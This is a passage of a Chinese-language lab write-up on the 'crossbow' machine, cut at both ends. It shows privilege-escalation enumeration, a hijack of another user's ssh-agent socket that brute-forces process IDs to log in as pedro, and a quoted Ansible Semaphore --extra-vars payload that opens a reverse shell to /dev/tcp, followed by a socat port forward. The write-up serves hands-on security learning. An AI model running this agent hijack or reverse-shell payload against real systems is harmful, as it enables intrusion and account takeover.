2&gt;\/dev\/null\n\/usr\/bin\/gpasswd\n\/usr\/bin\/passwd\n\/usr\/bin\/newgrp\n\/usr\/bin\/chsh\n\/usr\/bin\/su\n\/usr\/bin\/mount\n\/usr\/bin\/chfn\n\/usr\/bin\/umount\n\/usr\/bin\/fusermount3\n\/usr\/bin\/ntfs-3g\n\/usr\/bin\/sudo\n\/usr\/bin\/ssh\n\/usr\/sbin\/pppd\n\/usr\/sbin\/exim4\n\/usr\/lib\/cockpit\/cockpit-session\n\/usr\/lib\/polkit-1\/polkit-agent-helper-1\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n(remote) polo@crossbow:\/home\/polo$ find \/ -writable -type f 2&gt;\/dev\/null\n\/home\/polo\/.profile\n\/home\/polo\/.bash_logout\n\/home\/polo\/.bashrc\n.......\n(remote) polo@crossbow:\/home\/polo$ cd \/home\n(remote) polo@crossbow:\/home$ ls\nlea  polo\n(remote) polo@crossbow:\/home$ cd lea\n(remote) polo@crossbow:\/home\/lea$ ls -la\ntotal 48\ndrwxr-xr-x 1 lea  lea  4096 Sep 18  2023 .\ndrwxr-xr-x 1 root root 4096 Sep 18  2023 ..\nlrwxrwxrwx 1 root root    9 Sep  5  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 lea  lea   220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 lea  lea  3527 Sep 18  2023 .bashrc\ndrwx------ 2 lea  lea  4096 Sep 18  2023 .keychain\ndrwxr-xr-x 1 lea  lea  4096 Dec 14 18:29 .local\n-rw-r--r-- 1 lea  lea   807 Apr 23  2023 .profile\ndrwx------ 1 lea  lea  4096 Dec 14 17:55 .ssh\n(remote) polo@crossbow:\/home\/lea$ cd .ssh\nbash: cd: .ssh: Permission denied<\/code><\/pre>\n<p>\u51c6\u5907\u4f20<code>linpeas.sh<\/code>\u7684\u65f6\u5019\u53d1\u73b0\u4e86tmp\u6709\u5947\u602a\u7684\u4e1c\u897f\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) polo@crossbow:\/$ cd \/tmp\n(remote) polo@crossbow:\/tmp$ ls\ndbus-aOzC2qT5og  ssh-XXXXXXcE94FH  ssh-XXXXXXvsuvXX\n(remote) polo@crossbow:\/tmp$ file *\ndbus-aOzC2qT5og:  socket\nssh-XXXXXXcE94FH: directory\nssh-XXXXXXvsuvXX: directory\n(remote) polo@crossbow:\/tmp$ cd ssh-XXXXXXcE94FH\/\nbash: cd: ssh-XXXXXXcE94FH\/: Permission denied\n(remote) polo@crossbow:\/tmp$ cd ssh-XXXXXXvsuvXX\/\n(remote) polo@crossbow:\/tmp\/ssh-XXXXXXvsuvXX$ ls -la\ntotal 8\ndrwx------ 2 polo polo 4096 Apr  3 12:44 .\ndrwxrwxrwt 4 root root 4096 Apr  3 12:44 ..\nsrw------- 1 polo polo    0 Apr  3 12:44 agent.1259046\n(remote) polo@crossbow:\/tmp\/ssh-XXXXXXvsuvXX$ file agent.1259046 \nagent.1259046: socket<\/code><\/pre>\n<p>\u67e5\u770b\u4e00\u4e0b\u662f\u5426\u6b63\u5728\u8fd0\u884c\u6709\u76f8\u5173\u8fdb\u7a0b\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) polo@crossbow:\/tmp$ ps aux | grep &quot;ssh&quot;\nroot          30  0.0  0.1  15404  3356 ?        Ss   12:01   0:00 sshd: \/usr\/sbin\/sshd [listener] 0 of 10-100 startups\nlea         1089  0.0  0.1   7792  2964 ?        Ss   12:01   0:00 ssh-agent\npolo     1259061  0.0  0.0   7660   776 ?        Ss   12:44   0:00 \/usr\/bin\/ssh-agent\npolo     1639650  0.0  0.0   3744  1892 pts\/1    S+   12:57   0:00 grep ssh<\/code><\/pre>\n<p>\u53d1\u73b0\u7528\u6237<code>lea<\/code>\u6b63\u5728\u6267\u884c<code>ssh-agent<\/code><\/p>\n<h3>ssh-agent\u52ab\u6301<\/h3>\n<p>\u67e5\u770b\u4e00\u4e0b\u662f\u4e2a\u5565\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205684.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205684.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403210523198\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205685.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205685.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403210555216\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u4f7f\u7528\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">SSH_AUTH_SOCK=\/tmp\/ssh-XXXXXXvsuvXX\/agent.1259046; export SSH_AUTH_SOCK;<\/code><\/pre>\n<p>\u6ca1\u6bdb\u53cd\u5e94\uff0c\u6240\u4ee5\u8fd9\u524d\u9762\u662f\u8fde\u63a5\u4ee3\u7406\u7684\u610f\u601d\uff1f\u5c1d\u8bd5ssh\u8fde\u63a5\u4e00\u4e0b<code>lea<\/code>\u7528\u6237\uff1a<\/p>\n<pre><code class=\"language-bash\">SSH_AUTH_SOCK=\/tmp\/ssh-XXXXXXvsuvXX\/agent.1259046; ssh lea@172.20.10.3\nThe authenticity of host &#039;172.20.10.3 (172.20.10.3)&#039; can&#039;t be established.\nED25519 key fingerprint is SHA256:TCA\/ssXFaEc0sOJl0lvYyqTVTrCpkF0wQfyj5mJsALc.\nThis host key is known by the following other names\/addresses:\n    ~\/.ssh\/known_hosts:1: [hashed name]\n    ~\/.ssh\/known_hosts:4: [hashed name]\n    ~\/.ssh\/known_hosts:5: [hashed name]\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? \nHost key verification failed.<\/code><\/pre>\n<p>\u8bf4\u660e\u662f\u6709\u6548\u7684\uff0c\u53ef\u80fd\u662f\u4f7f\u7528\u65b9\u6cd5\u4e0d\u5bf9\uff0c\u6d4f\u89c8<a href=\"https:\/\/smallstep.com\/blog\/ssh-agent-explained\/\">\u76f8\u5173\u6587\u7ae0<\/a>\uff0c\u53d1\u73b0\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205686.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205686.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\u4ee3\u7406\u8f6c\u53d1-in-action.png\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205687.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205687.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\u7279\u5de5\u52ab\u6301.png\" \/><\/div><\/p>\n<p>\u539f\u6765\u662f\u4ee3\u7406\u8f6c\u53d1\uff0c\u53ef\u80fd\u90a3\u4e2a\u9700\u8981\u5229\u7528\u7684agent\u85cf\u5728\u4e86\u6ca1\u8ba9\u6211\u4eec\u6253\u5f00\u7684\u90a3\u4e2a\u6587\u4ef6\u4e2d\uff0c\u5c1d\u8bd5\u5229\u7528\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">SSH_AUTH_SOCK=\/tmp\/ssh-XXXXXXcE94FH\/agent.1089 \\ ssh lea@172.20.10.3<\/code><\/pre>\n<pre><code class=\"language-bash\">(remote) polo@crossbow:\/tmp\/ssh-XXXXXXvsuvXX$ SSH_AUTH_SOCK=\/tmp\/ssh-XXXXXXcE94FH\/agent.1089  ssh lea@172.20.10.3\nThe authenticity of host &#039;172.20.10.3 (172.20.10.3)&#039; can&#039;t be established.\nED25519 key fingerprint is SHA256:TCA\/ssXFaEc0sOJl0lvYyqTVTrCpkF0wQfyj5mJsALc.\nThis host key is known by the following other names\/addresses:\n    ~\/.ssh\/known_hosts:1: [hashed name]\n    ~\/.ssh\/known_hosts:4: [hashed name]\n    ~\/.ssh\/known_hosts:5: [hashed name]\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added &#039;172.20.10.3&#039; (ED25519) to the list of known hosts.\nlea@172.20.10.3&#039;s password: <\/code><\/pre>\n<p>\u770b\u6765\u6709\u673a\u4f1a\u554a\uff01<\/p>\n<p>\u5c1d\u8bd5\u4e00\u4e0b\u522b\u7684\u7528\u6237\uff1a<\/p>\n<pre><code class=\"language-apl\">lea\npolo\npedro<\/code><\/pre>\n<pre><code class=\"language-bash\">(remote) polo@crossbow:\/tmp\/ssh-XXXXXXvsuvXX$ SSH_AUTH_SOCK=\/tmp\/ssh-XXXXXXcE94FH\/agent.1089  ssh pedro@172.20.10.3\npedro@172.20.10.3&#039;s password:<\/code><\/pre>\n<p>\u5bf9\u80c3\u4e86\uff0c\u770b\u6765\u8fd9\u4e2a\u5bc6\u94a5\u7684\u8ba4\u8bc1\u548cpedro\u7684\u662f\u4e00\u6837\u7684\uff01\u67e5\u770b\u4e00\u4e0b\u8fdb\u7a0b\uff0c\u6ca1\u6709\u53d1\u73b0<code>pedro<\/code>\u76f8\u5173\u7684\uff0c\u53ef\u60dc\u3002<\/p>\n<pre><code class=\"language-bash\">ps -u pedro -o pid=<\/code><\/pre>\n<p>\u518d\u627e\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">ps -ef | grep ssh-agent<\/code><\/pre>\n<p>\u6ca1\u6709\u6536\u83b7\uff0c\u67e5\u770b\u4e00\u4e0b\u8fdb\u7a0b\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) polo@crossbow:\/tmp\/ssh-XXXXXXvsuvXX$ ps aux\nUSER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND\nroot           1  4.6  1.5  36932 31208 ?        Ss   12:01   4:04 \/usr\/bin\/python3 \/usr\/bin\/supervisord\nroot           6  0.0  0.0   2576   888 ?        S    12:01   0:00 \/bin\/sh \/usr\/sbin\/apachectl -D FOREGROUND\nroot           8  0.0  0.4 162176  8364 ?        Sl   12:01   0:00 \/usr\/lib\/cockpit\/cockpit-ws --no-tls\nlea           13  9.1  0.1   4564  3400 ?        S    12:01   7:59 \/bin\/bash \/home\/lea\/.local\/agent\nroot          20  0.0  1.2 201120 24412 ?        S    12:01   0:00 \/usr\/sbin\/apache2 -D FOREGROUND\nroot          26  0.0  0.1   3976  2132 ?        Ss   12:01   0:00 \/usr\/sbin\/cron\nroot          30  0.0  0.1  15404  3356 ?        Ss   12:01   0:00 sshd: \/usr\/sbin\/sshd [listener] 0 of 10-100 startups\nwww-data      58  0.3  0.6 201856 12680 ?        S    12:01   0:15 \/usr\/sbin\/apache2 -D FOREGROUND\nlea         1089  0.0  0.1   7792  2964 ?        Ss   12:01   0:00 ssh-agent\nwww-data  154228  0.3  0.6 201856 12684 ?        S    12:05   0:15 \/usr\/sbin\/apache2 -D FOREGROUND\nwww-data  154262  0.3  0.6 201856 12676 ?        S    12:05   0:15 \/usr\/sbin\/apache2 -D FOREGROUND\nwww-data  154300  0.3  0.6 201856 12696 ?        S    12:05   0:15 \/usr\/sbin\/apache2 -D FOREGROUND\nwww-data  263666  0.3  0.6 201856 12708 ?        S    12:09   0:15 \/usr\/sbin\/apache2 -D FOREGROUND\nwww-data  263719  0.3  0.6 201704 12420 ?        S    12:09   0:15 \/usr\/sbin\/apache2 -D FOREGROUND\nwww-data  263751  0.3  0.6 201712 12420 ?        S    12:09   0:15 \/usr\/sbin\/apache2 -D FOREGROUND\nwww-data  263752  0.3  0.6 201868 12684 ?        S    12:09   0:15 \/usr\/sbin\/apache2 -D FOREGROUND\nwww-data  263753  0.3  0.6 201856 12704 ?        S    12:09   0:15 \/usr\/sbin\/apache2 -D FOREGROUND\nwww-data  263754  0.3  0.6 201848 12656 ?        S    12:09   0:15 \/usr\/sbin\/apache2 -D FOREGROUND\nroot     1258977  0.0  0.2  11664  5484 ?        S    12:44   0:00 \/usr\/lib\/cockpit\/cockpit-session localhost\npolo     1259061  0.0  0.0   7660   776 ?        Ss   12:44   0:00 \/usr\/bin\/ssh-agent\npolo     1259123  0.0  0.4 309328  9084 ?        Sl   12:44   0:00 cockpit-bridge\npolo     1259141  0.0  0.2   8988  4148 ?        S    12:44   0:00 dbus-daemon --print-address --session\npolo     1266731  0.0  0.1   4608  3596 pts\/0    Ss   12:45   0:00 \/bin\/bash\npolo     1310390  0.0  0.1   4608  3692 pts\/0    S    12:46   0:00 bash -i\npolo     1310771  0.0  0.0   2936  1056 pts\/0    S+   12:46   0:00 \/usr\/bin\/script -qc \/usr\/bin\/bash \/dev\/null\npolo     1310773  0.0  0.1   4740  3864 pts\/1    Ss   12:46   0:00 \/usr\/bin\/bash\npolo     2575630  0.0  0.2   8536  4208 pts\/1    R+   13:28   0:00 ps aux\nlea      2575631  0.0  0.0   4728  1440 ?        R    13:28   0:00 find \/tmp -name ssh-* -type d<\/code><\/pre>\n<p>\u6ca1\u6709\u5934\u7eea\uff0c\u5148\u7830\u7830\u8fd0\u6c14\uff0c\u5728\u524d\u540e\u4e94\u5341\u4e2aPID\u5185\u67e5\u770b\u4e00\u4e0b\u662f\u5426\u53ef\u4ee5\u767b\u5f55\uff1a<\/p>\n<pre><code class=\"language-bash\">for i in {1040..1140}; do SSH_AUTH_SOCK=\/tmp\/ssh-XXXXXXcE94FH\/agent.$i  ssh pedro@172.20.10.3; done<\/code><\/pre>\n<p>\u4e00\u76f4\u6309\u56de\u8f66\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205688.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205688.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403213504381\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u8fd0\u6c14\u771f\u597d\uff0c\u76f4\u63a5\u641e\u51fa\u6765\u4e86\u3002<\/p>\n<h3>\u63d0\u6743\u503croot<\/h3>\n<p>\u67e5\u770b\u4e00\u4e0b\u8fde\u63a5\u60c5\u51b5\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205689.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205689.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403214019154\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u4e24\u4e2a\u4e0d\u660e\u8fde\u63a5\uff1a<\/p>\n<pre><code class=\"language-apl\">127.0.0.1:3306\n127.0.0.1:3000<\/code><\/pre>\n<p>\u8bbf\u95ee\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-html\">\u256d\u2500pedro@crossbow ~ \n\u2570\u2500$ curl 127.0.0.1:3306\ncurl: (1) Received HTTP\/0.9 when not allowed\n\u256d\u2500pedro@crossbow ~ \n\u2570\u2500$ curl 127.0.0.1:3000                                                                                                                                 1 \u21b5\n&lt;!DOCTYPE html&gt;\n&lt;html lang=&quot;en&quot;&gt;\n  &lt;head&gt;\n    &lt;base href=&quot;\/&quot;&gt;\n    &lt;meta charset=&quot;utf-8&quot;&gt;\n    &lt;meta http-equiv=&quot;X-UA-Compatible&quot; content=&quot;IE=edge&quot;&gt;\n    &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width,initial-scale=1.0&quot;&gt;\n    &lt;link rel=&quot;icon&quot; href=&quot;favicon.png&quot;&gt;\n    &lt;title&gt;Ansible Semaphore&lt;\/title&gt;\n  &lt;script defer type=&quot;module&quot; src=&quot;js\/chunk-vendors.66355ca7.js&quot;&gt;&lt;\/script&gt;&lt;script defer type=&quot;module&quot; src=&quot;js\/app.b2fc4bb2.js&quot;&gt;&lt;\/script&gt;&lt;link href=&quot;css\/chunk-vendors.e1031f37.css&quot; rel=&quot;stylesheet&quot;&gt;&lt;link href=&quot;css\/app.13f6f466.css&quot; rel=&quot;stylesheet&quot;&gt;&lt;script defer src=&quot;js\/chunk-vendors-legacy.b392e67e.js&quot; nomodule&gt;&lt;\/script&gt;&lt;script defer src=&quot;js\/app-legacy.cefb5b9b.js&quot; nomodule&gt;&lt;\/script&gt;&lt;\/head&gt;\n  &lt;body&gt;\n    &lt;noscript&gt;\n      &lt;strong&gt;\n          We&#039;re sorry but web doesn&#039;t work properly\n          without JavaScript enabled. Please enable it to continue.\n      &lt;\/strong&gt;\n    &lt;\/noscript&gt;\n    &lt;div id=&quot;app&quot;&gt;&lt;\/div&gt;\n    &lt;!-- built files will be auto injected --&gt;\n  &lt;\/body&gt;\n&lt;\/html&gt;<\/code><\/pre>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">\u256d\u2500pedro@crossbow ~ \n\u2570\u2500$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/bin\/gpasswd\n\/usr\/bin\/passwd\n\/usr\/bin\/sudo\n\/usr\/bin\/newgrp\n\/usr\/bin\/chsh\n\/usr\/bin\/su\n\/usr\/bin\/mount\n\/usr\/bin\/chfn\n\/usr\/bin\/umount\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\u256d\u2500pedro@crossbow ~ \n\u2570\u2500$ crontab -l\nno crontab for pedro\n\u256d\u2500pedro@crossbow ~ \n\u2570\u2500$ find \/ -writable -type f 2&gt;\/dev\/null\n\/sys\/kernel\/security\/apparmor\/.remove\n\/sys\/kernel\/security\/apparmor\/.replace\n\/sys\/kernel\/security\/apparmor\/.load\n\/sys\/kernel\/security\/apparmor\/.access\n\/sys\/kernel\/security\/tomoyo\/self_domain\n\/home\/pedro\/.profile\n\/home\/pedro\/.zsh_history\n\/home\/pedro\/.zcompdump-crossbow-5.9\n\/home\/pedro\/user.txt\n......\n\u256d\u2500pedro@crossbow ~ \n\u2570\u2500$ cat \/home\/pedro\/user.txt                                                                                                       \n58cb1e1bdb3a348ddda53f22ee7c1613<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205690.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205690.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403214532630\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205691.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205691.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403214604786\" style=\"zoom: 25%;\" \/><\/div><\/p>\n<p>\u627e\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u256d\u2500pedro@crossbow ~ \n\u2570\u2500$ find \/ -name Semaphore -type f 2&gt;\/dev\/null\n\u256d\u2500pedro@crossbow ~ \n\u2570\u2500$ find \/ -name semaphore -type f 2&gt;\/dev\/null\n\/usr\/bin\/semaphore<\/code><\/pre>\n<p>nice\uff01\u8fd8\u5728\u73af\u5883\u53d8\u91cf\u4e0b\uff0c\u5c1d\u8bd5\u8fd0\u884c\uff1a<\/p>\n<pre><code class=\"language-bash\">\u256d\u2500pedro@crossbow ~ \n\u2570\u2500$ semaphore\nAnsible Semaphore is a beautiful web UI for Ansible.\nSource code is available at https:\/\/github.com\/ansible-semaphore\/semaphore.\nComplete documentation is available at https:\/\/ansible-semaphore.com.\nUsage:\n  semaphore [flags]\n  semaphore [command]\nAvailable Commands:\n  completion  generate the autocompletion script for the specified shell\n  help        Help about any command\n  migrate     Execute migrations\n  server      Run in server mode\n  setup       Perform interactive setup\n  upgrade     Upgrade to latest stable version\n  user        Manage users\n  version     Print the version of Semaphore\nFlags:\n      --config string   Configuration file path\n  -h, --help            help for semaphore\nUse &quot;semaphore [command] --help&quot; for more information about a command.<\/code><\/pre>\n<p>\u770b\u4e00\u4e0b\u7248\u672c\uff1a<\/p>\n<pre><code class=\"language-bash\">\u256d\u2500pedro@crossbow ~ \n\u2570\u2500$ semaphore version\nv2.8.90<\/code><\/pre>\n<p>google\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205692.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205692.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403214948753\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u627e\u5230<a href=\"https:\/\/gist.github.com\/Alevsk\/1757da24c5fb8db735d392fd4146ca3a\">\u653b\u51fb\u65b9\u5f0f<\/a>\uff1a<\/p>\n<pre><code class=\"language-bash\">[Attack Vectors]\n\nThe --extra-vars parameter can be abused by a malicious user with low privileges to achieve Remote Command Execution (RCE) and read files and configurations, perform Server Side Request Forgery (SSRF), execute commands, and establish a reverse shell on the ansible server. Payload:\n\n{&quot;ansible_user&quot;: &quot;{{ lookup(&#039;ansible.builtin.pipe&#039;, \\&quot;bash -c &#039;exec bash -i &amp;&gt;\/dev\/tcp\/127.0.0.1\/1337 &lt;&amp;1&#039;\\&quot;) }}&quot;}<\/code><\/pre>\n<p>\u8fdb\u884c\u4e00\u4e0b\u7aef\u53e3\u8f6c\u53d1\uff0c\u5426\u5219\u6211\u4eec\u770b\u4e0d\u5230\u90a3\u4e2aUI\uff1a<\/p>\n<pre><code class=\"language-bash\">socat TCP-LISTEN:3001,fork TCP:127.0.0.1:3000 <\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205693.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205693.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403215410377\" style=\"zoom:50%;\" 